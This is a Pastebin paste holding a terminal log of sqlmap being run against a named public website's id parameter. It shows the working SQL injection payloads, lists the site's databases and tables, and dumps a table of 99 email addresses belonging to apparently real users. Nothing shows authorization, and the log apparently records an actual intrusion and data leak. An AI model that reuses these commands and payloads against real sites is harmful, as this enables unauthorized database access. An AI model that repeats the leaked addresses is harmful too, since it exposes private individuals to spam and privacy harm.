API tools faq
paste
Advertisement
Guest User

scan_sqlmap

a guest
May 22nd, 2017
1,746
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 13.62 KB | None | 0 0
raw download clone embed print report
  1. root@mr-zoel:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs        ___
  2.        __H__
  3.  ___ ___[(]_____ ___ ___  {1.1.5#stable}
  4. |_ -| . [']     | .'| . |
  5. |___|_  [,]_|_|_|__,|  _|
  6.       |_|V          |_|   http://sqlmap.org
  7.  
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9.  
  10. [*] starting at 02:26:47
  11.  
  12. [02:26:47] [INFO] resuming back-end DBMS 'mysql'
  13. [02:26:47] [INFO] testing connection to the target URL
  14. sqlmap resumed the following injection point(s) from stored session:
  15. ---
  16. Parameter: id (GET)
  17.    Type: boolean-based blind
  18.    Title: AND boolean-based blind - WHERE or HAVING clause
  19.    Payload: id=2 AND 7757=7757
  20.  
  21.    Type: error-based
  22.    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  23.    Payload: id=2 AND (SELECT 4525 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (ELT(4525=4525,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  24.  
  25.    Type: AND/OR time-based blind
  26.    Title: MySQL >= 5.0.12 AND time-based blind
  27.    Payload: id=2 AND SLEEP(5)
  28.  
  29.    Type: UNION query
  30.    Title: Generic UNION query (NULL) - 1 column
  31.    Payload: id=2 UNION ALL SELECT CONCAT(0x7162787071,0x5875426241435a6c744d615a635a4f56554e5052727169627577716a6f41554f75546d4272745154,0x7178627a71)-- OUrp
  32. ---
  33. [02:26:48] [INFO] the back-end DBMS is MySQL
  34. web application technology: Apache 2.4.25, PHP 5.5.38
  35. back-end DBMS: MySQL >= 5.0
  36. [02:26:48] [INFO] fetching database names
  37. available databases [5]:
  38. [*] bible_glossary
  39. [*] bible_history
  40. [*] information_schema
  41. [*] keywords
  42. [*] kidsdict
  43.  
  44. [02:26:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
  45.  
  46. [*] shutting down at 02:26:48
  47.  
  48. root@mr-zoel:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D bible_history --tables
  49.        ___
  50.       __H__
  51. ___ ___[,]_____ ___ ___  {1.1.5#stable}
  52. |_ -| . [,]     | .'| . |
  53. |___|_  [']_|_|_|__,|  _|
  54.      |_|V          |_|   http://sqlmap.org
  55.  
  56. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  57.  
  58. [*] starting at 02:27:00
  59.  
  60. [02:27:00] [INFO] resuming back-end DBMS 'mysql'
  61. [02:27:00] [INFO] testing connection to the target URL
  62. sqlmap resumed the following injection point(s) from stored session:
  63. ---
  64. Parameter: id (GET)
  65.     Type: boolean-based blind
  66.     Title: AND boolean-based blind - WHERE or HAVING clause
  67.     Payload: id=2 AND 7757=7757
  68.  
  69.     Type: error-based
  70.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  71.     Payload: id=2 AND (SELECT 4525 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (ELT(4525=4525,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  72.  
  73.     Type: AND/OR time-based blind
  74.     Title: MySQL >= 5.0.12 AND time-based blind
  75.     Payload: id=2 AND SLEEP(5)
  76.  
  77.     Type: UNION query
  78.     Title: Generic UNION query (NULL) - 1 column
  79.     Payload: id=2 UNION ALL SELECT CONCAT(0x7162787071,0x5875426241435a6c744d615a635a4f56554e5052727169627577716a6f41554f75546d4272745154,0x7178627a71)-- OUrp
  80. ---
  81. [02:27:01] [INFO] the back-end DBMS is MySQL
  82. web application technology: Apache 2.4.25, PHP 5.5.38
  83. back-end DBMS: MySQL >= 5.0
  84. [02:27:01] [INFO] fetching tables for database: 'bible_history'
  85. Database: bible_history
  86. [52 tables]
  87. +-----------------------------+
  88. | Emails                      |
  89. | administrators              |
  90. | bh_addform                  |
  91. | bh_guestbook                |
  92. | bho_board_bans              |
  93. | bho_board_forums            |
  94. | bho_board_posts             |
  95. | bho_board_search            |
  96. | bho_board_topics            |
  97. | bho_board_users             |
  98. | bible_book                  |
  99. | books                       |
  100. | cat                         |
  101. | categories                  |
  102. | chapters                    |
  103. | chapters1                   |
  104. | commentary_jfb              |
  105. | eastons                     |
  106. | guestbook                   |
  107. | isbe                        |
  108. | kingjames                   |
  109. | kjv_verse                   |
  110. | links                       |
  111. | mathew                      |
  112. | naves                       |
  113. | naves_phrase                |
  114. | naves_verse                 |
  115. | ob_book_abbreviation_lookup |
  116. | outline_chapter             |
  117. | outline_major_section       |
  118. | questions                   |
  119. | series                      |
  120. | smiths                      |
  121. | smiths_ref                  |
  122. | sub                         |
  123. | subjects                    |
  124. | tbl_dictionary              |
  125. | tbl_fausset                 |
  126. | tbl_gfd                     |
  127. | tbl_hitchcock               |
  128. | tbl_hollman                 |
  129. | tbl_ibhcategory             |
  130. | tbl_ibhsubcategory          |
  131. | tbl_image                   |
  132. | tbl_isbe                    |
  133. | tbl_sdas                    |
  134. | tbl_the                     |
  135. | tbl_tt                      |
  136. | tbl_vcx                     |
  137. | user_links                  |
  138. | web_verse                   |
  139. | web_verse_bak               |
  140. +-----------------------------+
  141.  
  142. [02:27:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
  143.  
  144. [*] shutting down at 02:27:01
  145.  
  146. root@mr-zoel:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D bible_history -T Emails --columns
  147.         ___
  148.        __H__
  149.  ___ ___[.]_____ ___ ___  {1.1.5#stable}
  150. |_ -| . [(]     | .'| . |
  151. |___|_  ["]_|_|_|__,|  _|
  152.      |_|V          |_|   http://sqlmap.org
  153.  
  154. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  155.  
  156. [*] starting at 02:27:17
  157.  
  158. [02:27:17] [INFO] resuming back-end DBMS 'mysql'
  159. [02:27:17] [INFO] testing connection to the target URL
  160. sqlmap resumed the following injection point(s) from stored session:
  161. ---
  162. Parameter: id (GET)
  163.     Type: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE or HAVING clause
  165.     Payload: id=2 AND 7757=7757
  166.  
  167.     Type: error-based
  168.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  169.     Payload: id=2 AND (SELECT 4525 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (ELT(4525=4525,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  170.  
  171.     Type: AND/OR time-based blind
  172.     Title: MySQL >= 5.0.12 AND time-based blind
  173.     Payload: id=2 AND SLEEP(5)
  174.  
  175.     Type: UNION query
  176.     Title: Generic UNION query (NULL) - 1 column
  177.     Payload: id=2 UNION ALL SELECT CONCAT(0x7162787071,0x5875426241435a6c744d615a635a4f56554e5052727169627577716a6f41554f75546d4272745154,0x7178627a71)-- OUrp
  178. ---
  179. [02:27:18] [INFO] the back-end DBMS is MySQL
  180. web application technology: Apache 2.4.25, PHP 5.5.38
  181. back-end DBMS: MySQL >= 5.0
  182. [02:27:18] [INFO] fetching columns for table 'Emails' in database 'bible_history'
  183. Database: bible_history
  184. Table: Emails
  185. [5 columns]
  186. +----------+-----------+
  187. | Column   | Type      |
  188. +----------+-----------+
  189. | created  | timestamp |
  190. | email_id | text      |
  191. | id       | int(11)   |
  192. | randing  | int(11)   |
  193. | verified | int(11)   |
  194. +----------+-----------+
  195.  
  196. [02:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
  197.  
  198. [*] shutting down at 02:27:19
  199.  
  200. root@mr-zoel:~# sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D bible_history -T Emails -C email_id --dump
  201.         ___
  202.        __H__
  203.  ___ ___[(]_____ ___ ___  {1.1.5#stable}
  204. |_ -| . [,]     | .'| . |
  205. |___|_  [(]_|_|_|__,|  _|
  206.      |_|V          |_|   http://sqlmap.org
  207.  
  208. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  209.  
  210. [*] starting at 02:27:38
  211.  
  212. [02:27:38] [INFO] resuming back-end DBMS 'mysql'
  213. [02:27:38] [INFO] testing connection to the target URL
  214. sqlmap resumed the following injection point(s) from stored session:
  215. ---
  216. Parameter: id (GET)
  217.     Type: boolean-based blind
  218.     Title: AND boolean-based blind - WHERE or HAVING clause
  219.     Payload: id=2 AND 7757=7757
  220.  
  221.     Type: error-based
  222.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  223.     Payload: id=2 AND (SELECT 4525 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (ELT(4525=4525,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  224.  
  225.     Type: AND/OR time-based blind
  226.     Title: MySQL >= 5.0.12 AND time-based blind
  227.     Payload: id=2 AND SLEEP(5)
  228.  
  229.     Type: UNION query
  230.     Title: Generic UNION query (NULL) - 1 column
  231.     Payload: id=2 UNION ALL SELECT CONCAT(0x7162787071,0x5875426241435a6c744d615a635a4f56554e5052727169627577716a6f41554f75546d4272745154,0x7178627a71)-- OUrp
  232. ---
  233. [02:27:39] [INFO] the back-end DBMS is MySQL
  234. web application technology: Apache 2.4.25, PHP 5.5.38
  235. back-end DBMS: MySQL >= 5.0
  236. [02:27:39] [INFO] fetching entries of column(s) 'email_id' for table 'Emails' in database 'bible_history'
  237. [02:27:40] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
  238. [02:27:40] [INFO] the SQL query used returns 100 entries
  239. [02:27:40] [INFO] analyzing table dump for possible password hashes            
  240. Database: bible_history
  241. Table: Emails
  242. [99 entries]
  243. +------------------------------+
  244. | email_id                     |
  245. +------------------------------+
  246. | 111lobster111@gmail.com      |
  247. | 9ball@teleclipse.net         |
  248. | abdoukeb23@gmail.com         |
  249. | aeking@bell.net              |
  250. | akomax@hotmail.com           |
  251. | andre@ipib.org               |
  252. | arroyorios12@yahoo.com       |
  253. | asdf1925                     |
  254. | asdf6750                     |
  255. | bastlesl@gmail.com           |
  256. | bkiran.vkb@gmail.com         |
  257. | Blackard74@gmail.com         |
  258. | bwalyacharl@gmail.com        |
  259. | Chacokat27@yahoo.com         |
  260. | charles.arries@gmail.com     |
  261. | chinnooker@att.net           |
  262. | chris.hanbury@gmail.com      |
  263. | cjsnaffles@yahoo.com         |
  264. | ckabelle@hotmail.com         |
  265. | contep@tds.net               |
  266. | corley.rachael@yahoo.com     |
  267. | cstegall08@gmail.com         |
  268. | dbrown@loyolahs.edu          |
  269. | deonglweb@gmail.com          |
  270. | dhfaerber@bigpond.com        |
  271. | djwynne_sills@yahoo.com      |
  272. | dricana10@yahoo.com          |
  273. | frandymc@yahoo.com           |
  274. | genesis27756@hotmail.com     |
  275. | gkokali@aol.com              |
  276. | godfavoritehouse@gmail.com   |
  277. | henryfonda@optusnt.com.au    |
  278. | hlatt1@verizon.net           |
  279. | hmreal@hotmail.com           |
  280. | jasonnicholl75@gmail.com     |
  281. | jeff.flint@activ8.net.au     |
  282. | jhadley2468@gmail.com        |
  283. | johnnyestrada@me.com         |
  284. | josephraju.srinu@gmail.com   |
  285. | kathy.merrill@principia.edu  |
  286. | kegrubb@hotmail.com          |
  287. | kimjk6404@hotmail.com        |
  288. | kingsouha123@gmail.com       |
  289. | koukou@hotmail.fr            |
  290. | ktiaeuktoiueaozt@hotmail.fr  |
  291. | kubheka.xc@gmai.com          |
  292. | ladypink0313@yahoo.com       |
  293. | lenebug90945@gmail.com       |
  294. | lgolfman@yahoo.ca            |
  295. | LILLIEGIN@CA.RR.COM          |
  296. | livealonenever@yahoo.com     |
  297. | LMOUMENSAID1@GMAIL.COM       |
  298. | luis.j_rivera@yahoo.com      |
  299. | maurice2peter@gmail.com      |
  300. | mbokisibilina@gmail.com      |
  301. | medram90@gmail.com           |
  302. | meigsal328@gmail.com         |
  303. | melv2008@gmail.com           |
  304. | mollyvwellman@hughes.net     |
  305. | mtruelove1967@icloud.com     |
  306. | mymail@gmail.com             |
  307. | nafzi@hotmail.fr             |
  308. | naseraddinhd@gmail.com       |
  309. | nsanyatoyo@hotmail.com       |
  310. | ntheyagaraj@gmail.com        |
  311. | oneurima@yahoo.com           |
  312. | overcomer40@hotmail.com      |
  313. | pbobbt@aol.com               |
  314. | peacemaker159@bellsouth.net  |
  315. | peppercorn1@gmail.com        |
  316. | peterstierjr@gmail.com       |
  317. | Philndebby@gmail.com         |
  318. | reneejohnson557@comcast.net  |
  319. | reneemmartinez@gmail.com     |
  320. | renzden@gmail.com            |
  321. | roneu1946@hotmail.com        |
  322. | rosarioan16@yahoo.com        |
  323. | rubelsmail80@gmsil.com       |
  324. | sample@email.tst             |
  325. | sanderscynthia4098@yahoo.com |
  326. | sbhshsjjs@gnail.com          |
  327. | scottarath@msn.com           |
  328. | selcukerkal2@gmail.com       |
  329. | sharonarmke@gmail.com        |
  330. | skinner.eve@gmail.com        |
  331. | squirrelpatch@yahoo.com      |
  332. | srkohh@gmail.com             |
  333. | stevenkarlhamer@yahoo.co.uk  |
  334. | tankokchai@gmail.com         |
  335. | thershberger@caj.or.jp       |
  336. | timkyles93@gmail.com         |
  337. | tjstansell@bellsouth.att     |
  338. | ultradeion@outlook.com       |
  339. | vega@example.com             |
  340. | wandahickson@yahoo.com       |
  341. | wfurnaris@aolc.om            |
  342. | winter@example.com           |
  343. | wolstes@telkomsa.net         |
  344. | yaaawuah@yahoo.com           |
  345. +------------------------------+
  346.  
  347. [02:27:40] [INFO] table 'bible_history.Emails' dumped to CSV file '/root/.sqlmap/output/www.bible-history.com/dump/bible_history/Emails.csv'
  348. [02:27:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.bible-history.com'
  349.  
  350. [*] shutting down at 02:27:40
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!